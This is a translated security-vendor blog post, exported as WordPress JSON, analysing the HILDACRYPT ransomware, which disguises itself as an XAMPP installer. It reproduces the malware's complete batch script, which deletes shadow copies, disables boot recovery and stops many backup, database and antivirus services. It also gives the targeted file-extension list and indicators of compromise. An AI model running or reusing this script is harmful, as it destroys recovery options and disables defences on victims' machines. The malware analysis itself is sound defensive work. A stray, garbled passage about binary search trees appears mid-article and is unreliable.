{"id":52277,"date":"2019-11-05T00:00:00","date_gmt":"2019-11-04T21:00:00","guid":{"rendered":"https:\/\/prohoster.info\/blog\/blog_prohoster\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam"},"modified":"2020-02-18T13:59:57","modified_gmt":"2020-02-18T10:59:57","slug":"hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","status":"publish","type":"post","link":"https:\/\/prohoster.info\/en\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","title":{"rendered":"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>Hello, Habr! Once again, we bring you news about fresh versions of malware in the Ransomware category. HILDACRYPT is a new ransomware program, a representative of the family discovered in August 2019, named after a cartoon from the Netflix streaming service that was used to distribute the software. Today, we are exploring the technical specifics of this updated ransomware virus.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions\" src=\"\/wp-content\/uploads\/2019\/11\/b42870531485dd30670e35e6a5e5125f.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><br \/>\nIn the first versions of the Hilda ransomware, a link to a trailer <noindex><a rel=\"nofollow\" href=\"https:\/\/www.youtube.com\/watch?v=XCojP2Ubuto\">on YouTube<\/a><\/noindex> for the animated series was included in the ransom note. HILDACRYPT, however, disguises itself as a legitimate XAMPP installer\u2014a simple-to-install distribution of Apache that includes MariaDB, PHP, and Perl. Additionally, the ransomware has a different file name\u2014xamp. Moreover, the ransomware file does not have a digital signature.<\/p>\n<h3>Static analysis<\/h3>\n<p>\nThe ransomware is contained in a PE32 .NET file, written for MS Windows. Its size is 135,168 bytes. Both the main program code and the protective program code are written in C#. According to the date and time stamp of compilation, the binary file was created on September 14, 2019.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions\" src=\"\/wp-content\/uploads\/2019\/11\/9b04f91f5f56ad0ff981bb2a944fa848.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nAccording to Detect It Easy, the ransomware is packed using Confuser and ConfuserEx, but these obfuscators are the same as before; only ConfuserEx is the successor to Confuser, so their code signatures are similar. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions\" src=\"\/wp-content\/uploads\/2019\/11\/ce65d4db560ea7d62ef228378ab207e6.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nHILDACRYPT is indeed packed using ConfuserEx. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions\" src=\"\/wp-content\/uploads\/2019\/11\/eee308f9f6080b616c08e2f6709245d8.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nSHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a<\/p>\n<h3>Attack vector<\/h3>\n<p>\nMost likely, the ransomware was discovered on one of the websites dedicated to web programming, disguised as a legitimate XAMPP program.<\/p>\n<p>The entire infection chain can be seen in the <noindex><a rel=\"nofollow\" href=\"https:\/\/app.any.run\/tasks\/abe20240-2f3c-40cf-b5dd-4f0088ab1c5a\/\">app.any.run sandbox<\/a><\/noindex>.<\/p>\n<h3>Obfuscation <\/h3>\n<p>\nThe strings of the ransomware are stored in an encrypted form. When HILDACRYPT runs, it decrypts them using Base64 and AES-256-CBC.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions\" src=\"\/wp-content\/uploads\/2019\/11\/9e2a478ba19480308dcff887c2353e18.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h3>Installation<\/h3>\n<p>\nFirst of all, the ransomware creates a folder in %AppDataRoaming% with a GUID (Globally Unique Identifier) parameter generated randomly. By adding a bat file to this location, the ransomware executes it using cmd.exe:<\/p>\n<p><i>cmd.exe \/c JKfgkgj3hjgfhjka.bat &amp; exit<br \/>\n<\/i><br \/>\n<img decoding=\"async\" alt=\"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions\" src=\"\/wp-content\/uploads\/2019\/11\/5319151b3f57af2394e6031f4cd1bcd6.jpg\" style=\"display:block;margin: 0 auto;\" \/><img decoding=\"async\" alt=\"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions\" src=\"\/wp-content\/uploads\/2019\/11\/c0c749619f3f9a240e362f5effb5ea2e.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\nIt then begins executing a batch script to disable system functions or services.<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions\" src=\"\/wp-content\/uploads\/2019\/11\/ecea9735d151835ddeeb62986b325399.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nThe script contains a long list of commands that destroy shadow copies, disable the SQL server, backup, and antivirus solutions.<\/p>\n<p>For example, it unsuccessfully attempts to stop Acronis Backup services. Additionally, it targets the backup systems and antivirus solutions of the following providers: Veeam, Sophos, Kaspersky, McAfee, and others.<\/p>\n<pre><code class=\"plaintext\">@echo off\n:: I'm not really a fan of ponies; cartoon girls are better, don't you think?\nvssadmin resize shadowstorage \/for=c: \/on=c: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=c: \/on=c: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=d: \/on=d: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=d: \/on=d: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=e: \/on=e: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=e: \/on=e: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=f: \/on=f: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=f: \/on=f: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=g: \/on=g: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=g: \/on=g: \/maxsize=unbounded\nvssadmin resize shadowstorage \/for=h: \/on=h: \/maxsize=401MB\nvssadmin resize shadowstorage \/for=h: \/on=h: \/maxsize=unbounded\nbcdedit \/set {default} recoveryenabled No\nbcdedit \/set {default} bootstatuspolicy ignoreallfailures\nvssadmin Delete Shadows \/all \/quiet\nnet stop SQLAgent$SYSTEM_BGC \/y\nnet stop \u201cSophos Device Control Service\u201d \/y\nnet stop macmnsvc \/y\nnet stop SQLAgent$ECWDB2 \/y\nnet stop \u201cZoolz 2 Service\u201d \/y\nnet stop McTaskManager \/y\nnet stop \u201cSophos AutoUpdate Service\u201d \/y\nnet stop \u201cSophos System Protection Service\u201d \/y\nnet stop EraserSvc11710 \/y\nnet stop PDVFSService \/y\nnet stop SQLAgent$PROFXENGAGEMENT \/y\nnet stop SAVService \/y\nnet stop MSSQLFDLauncher$TPSAMA \/y\nnet stop EPSecurityService \/y\nnet stop SQLAgent$SOPHOS \/y\nnet stop \u201cSymantec System Recovery\u201d \/y\nnet stop Antivirus \/y\nnet stop SstpSvc \/y\nnet stop MSOLAP$SQL_2008 \/y\nnet stop TrueKeyServiceHelper \/y\nnet stop sacsvr \/y\nnet stop VeeamNFSSvc \/y\nnet stop FA_Scheduler \/y\nnet stop SAVAdminService \/y\nnet stop EPUpdateService \/y\nnet stop VeeamTransportSvc \/y\nnet stop \u201cSophos Health Service\u201d \/y\nnet stop bedbg \/y\nnet stop MSSQLSERVER \/y\nnet stop KAVFS \/y\nnet stop Smcinst \/y\nnet stop MSSQLServerADHelper100 \/y\nnet stop TmCCSF \/y\nnet stop wbengine \/y\nnet stop SQLWriter \/y\nnet stop MSSQLFDLauncher$TPS \/y\nnet stop SmcService \/y\nnet stop ReportServer$TPSAMA \/y\nnet stop swi_update \/y\nnet stop AcrSch2Svc \/y\nnet stop MSSQL$SYSTEM_BGC \/y\nnet stop VeeamBrokerSvc \/y\nnet stop MSSQLFDLauncher$PROFXENGAGEMENT \/y\nnet stop VeeamDeploymentService \/y\nnet stop SQLAgent$TPS \/y\nnet stop DCAgent \/y\nnet stop \u201cSophos Message Router\u201d \/y\nnet stop MSSQLFDLauncher$SBSMONITORING \/y\nnet stop wbengine \/y\nnet stop MySQL80 \/y\nnet stop MSOLAP$SYSTEM_BGC \/y\nnet stop ReportServer$TPS \/y\nnet stop MSSQL$ECWDB2 \/y\nnet stop SntpService \/y\nnet stop SQLSERVERAGENT \/y\nnet stop BackupExecManagementService \/y\nnet stop SMTPSvc \/y\nnet stop mfefire \/y\nnet stop BackupExecRPCService \/y\nnet stop MSSQL$VEEAMSQL2008R2 \/y\nnet stop klnagent \/y\nnet stop MSExchangeSA \/y\nnet stop MSSQLServerADHelper \/y\nnet stop SQLTELEMETRY \/y\nnet stop \u201cSophos Clean Service\u201d \/y\nnet stop swi_update_64 \/y\nnet stop \u201cSophos Web Control Service\u201d \/y\nnet stop EhttpSrv \/y\nnet stop POP3Svc \/y\nnet stop MSOLAP$TPSAMA \/y\nnet stop McAfeeEngineService \/y\nnet stop \u201cVeeam Backup Catalog Data Service\u201d \/\net stop MSSQL$SBSMONITORING \/y\nnet stop ReportServer$SYSTEM_BGC \/y\nnet stop AcronisAgent \/y\nnet stop KAVFSGT \/y\nnet stop BackupExecDeviceMediaService \/y\nnet stop MySQL57 \/y\nnet stop McAfeeFrameworkMcAfeeFramework \/y\nnet stop TrueKey \/y\nnet stop VeeamMountSvc \/y\nnet stop MsDtsServer110 \/y\nnet stop SQLAgent$BKUPEXEC \/y\nnet stop UI0Detect \/y\nnet stop ReportServer \/y\nnet stop SQLTELEMETRY$ECWDB2 \/y\nnet stop MSSQLFDLauncher$SYSTEM_BGC \/y\nnet stop MSSQL$BKUPEXEC \/y\nnet stop SQLAgent$PRACTTICEBGC \/y\nnet stop MSExchangeSRS \/y\nnet stop SQLAgent$VEEAMSQL2008R2 \/y\nnet stop McShield \/y\nnet stop SepMasterService \/y\nnet stop \u201cSophos MCS Client\u201d \/y\nnet stop VeeamCatalogSvc \/y\nnet stop SQLAgent$SHAREPOINT \/y\nnet stop NetMsmqActivator \/y\nnet stop kavfsslp \/y\nnet stop tmlisten \/y\nnet stop ShMonitor \/y\nnet stop MsDtsServer \/y\nnet stop SQLAgent$SQL_2008 \/y\nnet stop SDRSVC \/y\nnet stop IISAdmin \/y\nnet stop SQLAgent$PRACTTICEMGT \/y\nnet stop BackupExecJobEngine \/y\nnet stop SQLAgent$VEEAMSQL2008R2 \/y\nnet stop BackupExecAgentBrowser \/y\nnet stop VeeamHvIntegrationSvc \/y\nnet stop masvc \/y\nnet stop W3Svc \/y\nnet stop \u201cSQLsafe Backup Service\u201d \/y\nnet stop SQLAgent$CXDB \/y\nnet stop SQLBrowser \/y\nnet stop MSSQLFDLauncher$SQL_2008 \/y\nnet stop VeeamBackupSvc \/y\nnet stop \u201cSophos Safestore Service\u201d \/y\nnet stop svcGenericHost \/y\nnet stop ntrtscan \/y\nnet stop SQLAgent$VEEAMSQL2012 \/y\nnet stop MSExchangeMGMT \/y\nnet stop SamSs \/y\nnet stop MSExchangeES \/y\nnet stop MBAMService \/y\nnet stop EsgShKernel \/y\nnet stop ESHASRV \/y\nnet stop MSSQL$TPSAMA \/y\nnet stop SQLAgent$CITRIX_METAFRAME \/y\nnet stop VeeamCloudSvc \/y\nnet stop \u201cSophos File Scanner Service\u201d \/y\nnet stop \u201cSophos Agent\u201d \/y\nnet stop MBEndpointAgent \/y\nnet stop swi_service \/y\nnet stop MSSQL$PRACTICEMGT \/y\nnet stop SQLAgent$TPSAMA \/y\nnet stop McAfeeFramework \/y\nnet stop \u201cEnterprise Client Service\u201d \/y\nnet stop SQLAgent$SBSMONITORING \/y\nnet stop MSSQL$VEEAMSQL2012 \/y\nnet stop swi_filter \/y\nnet stop SQLSafeOLRService \/y\nnet stop BackupExecVSSProvider \/y\nnet stop VeeamEnterpriseManagerSvc \/y\nnet stop SQLAgent$SQLEXPRESS \/y\nnet stop OracleClientCache80 \/y\nnet stop MSSQL$PROFXENGAGEMENT \/y\nnet stop IMAP4Svc \/y\nnet stop ARSM \/y\nnet stop MSExchangeIS \/y\nnet stop AVP \/y\nnet stop MSSQLFDLauncher \/y\nnet stop MSExchangeMTA \/y\nnet stop TrueKeyScheduler \/y\nnet stop MSSQL$SOPHOS \/y\nnet stop \u201cSQL Backups\u201d \/y\nnet stop MSSQL$TPS \/y\nnet stop mfemms \/y\nnet stop MsDtsServer100 \/y\nnet stop MSSQL$SHAREPOINT \/y\nnet stop WRSVC \/y\nnet stop mfevtp \/y\nnet stop msftesql$PROD \/y\nnet stop mozyprobackup \/y\nnet stop MSSQL$SQL_2008 \/y\nnet stop SNAC \/y\nnet stop ReportServer$SQL_2008 \/y\nnet stop BackupExecAgentAccelerator \/y\nnet stop MSSQL$SQLEXPRESS \/y\nnet stop MSSQL$PRACTTICEBGC \/y\nnet stop VeeamRESTSvc \/y\nnet stop sophossps \/y\nnet stop ekrn \/y\nnet stop MMS \/y\nnet stop \u201cSophos MCS Agent\u201d \/y\nnet stop RESvc \/y\nnet stop \u201cAcronis VSS Provider\u201d \/y\nnet stop MSSQL$VEEAMSQL2008R2 \/y\nnet stop MSSQLFDLauncher$SHAREPOINT \/y\nnet stop \u201cSQLsafe Filter Service\u201d \/y\nnet stop MSSQL$PROD \/y\nnet stop SQLAgent$PROD \/y\nnet stop MSOLAP$TPS \/y\nnet stop VeeamDeploySvc \/y\nnet stop MSSQLServerOLAPService \/y\ndel %0\n<\/code><\/pre>\n<p>\nOnce the aforementioned services and processes are disabled, the cryptolocker gathers information about all running processes using the tasklist command to ensure that all necessary services are non-functional. <br \/>\n<i>tasklist v \/fo csv<\/i><\/p>\n<p>This command outputs a detailed list of running processes, with elements separated by a comma. <br \/>\n<i>\u00abcsrss.exe\u00bb,\u00ab448\u00bb,\u00abservices\u00bb,\u00ab0\u00bb,\u00ab1,896 KB\u00bb,\u00abunknown\u00bb,\u00bb\/\u00bb,\u00ab0:00:03\u00bb,\u00bb\/\u00bb\u00bb<br \/>\n<\/i><\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions\" src=\"\/wp-content\/uploads\/2019\/11\/b16a8f52dba47ace2ca99d120f4f9b01.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nAfter this check, the ransomware begins the encryption process. <\/p>\n<h3>Encryption <br \/>\n<\/h3>\n<h4>File Encryption<\/h4>\n<p>\nHILDACRYPT scans through all found contents on the hard drives, except for the Recycle.Bin and Reference AssembliesMicrosoft folders. The latter contains critical files like dll, pdb, and others for .Net applications, which may impact the operation of the ransomware. The following list of extensions is used to find files to be encrypted:<\/p>\n<p><i>\u00ab.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md\u00bb<br \/>\n<\/i><br \/>\nTo encrypt user files, the ransomware uses the AES-256-CBC algorithm. The key size is 256 bits, and the initialization vector (IV) size is 16 bytes. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions\" src=\"\/wp-content\/uploads\/2019\/11\/7c1a57562a3f8ada074639fbab35429d.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nIn the following screenshot, the values byte_2 and byte_1 were randomly obtained using GetBytes(). <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions\" src=\"\/wp-content\/uploads\/2019\/11\/fcd506b4ebf6ccb056b69ccc7249641a.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\n\u2014 some characteristic of the node (for example, a number). The key is needed to identify the element of the tree corresponding to this key. Example of a binary search tree:<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions\" src=\"\/wp-content\/uploads\/2019\/11\/9af5398ae995176297743fbd94054d6d.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nEN<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions\" src=\"\/wp-content\/uploads\/2019\/11\/e6626bce140fdfca6bb989602b959786.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nThe encrypted file has the extension HCY!.. This is an example of an encrypted file. A key and IV were created for this file, as mentioned above. <\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions\" src=\"\/wp-content\/uploads\/2019\/11\/f6d659bfe8a8217457e06fed916a4f2d.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h4>Key Encryption<\/h4>\n<p>\nThe cryptolocker stores the generated AES key in the encrypted file. The first part of the encrypted file has a header that contains data such as HILDACRYPT, KEY, IV, FileLen in XML format, and looks as follows:<\/p>\n<p><img decoding=\"async\" alt=\"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions\" src=\"\/wp-content\/uploads\/2019\/11\/e0d887d87b06346da88104c2d60940b8.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nThe AES key and IV are encrypted using RSA-2048, and encoded using Base64. The RSA public key is stored in the body of the cryptolocker in one of the encrypted strings in XML format.<\/p>\n<p><code>28guEbzkzciKg3N\/ExUq8jGcshuMSCmoFsh\/3LoMyWzPrnfHGhrgotuY\/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u\/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5\/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8\/qfjMtZ41sIIIEyajVKfA18OT72\/UBME2gsAM\/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa\/jQ==AQAB<br \/>\n<\/code><\/p>\n<p>The AES file key is encrypted using the RSA public key. The RSA public key is Base64-encoded and consists of a modulus and the public exponent 65537. A private RSA key is required for decryption, which is held by the attacker.<\/p>\n<p>After RSA encryption, the AES key is encoded using Base64, stored in the encrypted file.<\/p>\n<h3>Ransom message<\/h3>\n<p>\nUpon completion of the encryption, HILDACRYPT writes an HTML file into the folder where it encrypted the files. The ransom program's notification contains two email addresses through which the victim can contact the attacker.<\/p>\n<ul>\n<li><i>hildalolilovesyou@airmail.cc<\/i><br \/>\n hildalolilovesyou@memeware.net\n<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"HILDACRYPT: a new ransomware program strikes at backup systems and antivirus solutions\" src=\"\/wp-content\/uploads\/2019\/11\/9996e9a6741ac3b8c423374c83924a91.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nThe ransom note also contains the phrase \"No loli is safe;)\" \u2014 a reference to the banned characters in Japan from anime and manga that resemble small girls.<\/p>\n<h3>Output<\/h3>\n<p>\nHILDACRYPT, a new family of ransomware, has released a new version. The encryption model prevents the victim from decrypting the files encrypted by the ransomware. The cryptolocker employs active protection methods to disable security services related to backup systems and antivirus solutions. The author of HILDACRYPT is a fan of the animated series Hilda, which is showcased on Netflix, and a link to the trailer was included in the ransom letter for a previous version of the software. <\/p>\n<p>As usual, <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/business\/backup\/\">Acronis Backup<\/a><\/noindex> and <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/personal\/computer-backup\/\">Acronis True Image<\/a><\/noindex> can protect your computer from the HILDACRYPT ransomware, and providers have the ability to protect their clients with <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/cloud\/service-provider\/backup\/\">Acronis Backup Cloud<\/a><\/noindex>. Protection is ensured due to the fact that these solutions <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/cyber-protection\/\">cybersecurity<\/a><\/noindex> include not only backup but also our integrated protection system <noindex><a rel=\"nofollow\" href=\"https:\/\/www.acronis.com\/en-us\/ransomware-protection\/\">Acronis Active Protection<\/a><\/noindex> \u2014 a technology powered by machine learning and based on behavioral heuristics, which, unlike any other, can counter zero-day ransomware threats.<\/p>\n<h3>Indicators of Compromise<\/h3>\n<p>\nFile extension HCY!<br \/>\nHILDACRYPTReadMe.html<br \/>\nxamp.exe with a single 'p' and without a digital signature<br \/>\nSHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a<br \/>\n<br \/>Source: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/company\/acronis\/blog\/474048\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware. HILDACRYPT \u2014 \u044d\u0442\u043e \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 2019 \u0433\u043e\u0434\u0430 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432\u0430 Hilda, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0432 \u0447\u0435\u0441\u0442\u044c \u043c\u0443\u043b\u044c\u0442\u0444\u0438\u043b\u044c\u043c\u0430 \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433\u043e\u0432\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0438\u0441\u0430 Netflix, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u041f\u041e. \u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u044b \u0437\u043d\u0430\u043a\u043e\u043c\u0438\u043c\u0441\u044f \u0441 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044f\u043c\u0438 \u0440\u0430\u0431\u043e\u0442\u044b \u044d\u0442\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u0438\u0440\u0443\u0441\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044f. \u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 Hilda [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-52277","post","type-post","status-publish","format-standard","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.2 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/en\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.2\" \/>\n\t\t<meta property=\"og:locale\" content=\"en_US\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47HILDACRYPT: \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c \u043d\u0430\u043d\u043e\u0441\u0438\u0442 \u0443\u0434\u0430\u0440 \u043f\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u043e\u0433\u043e \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 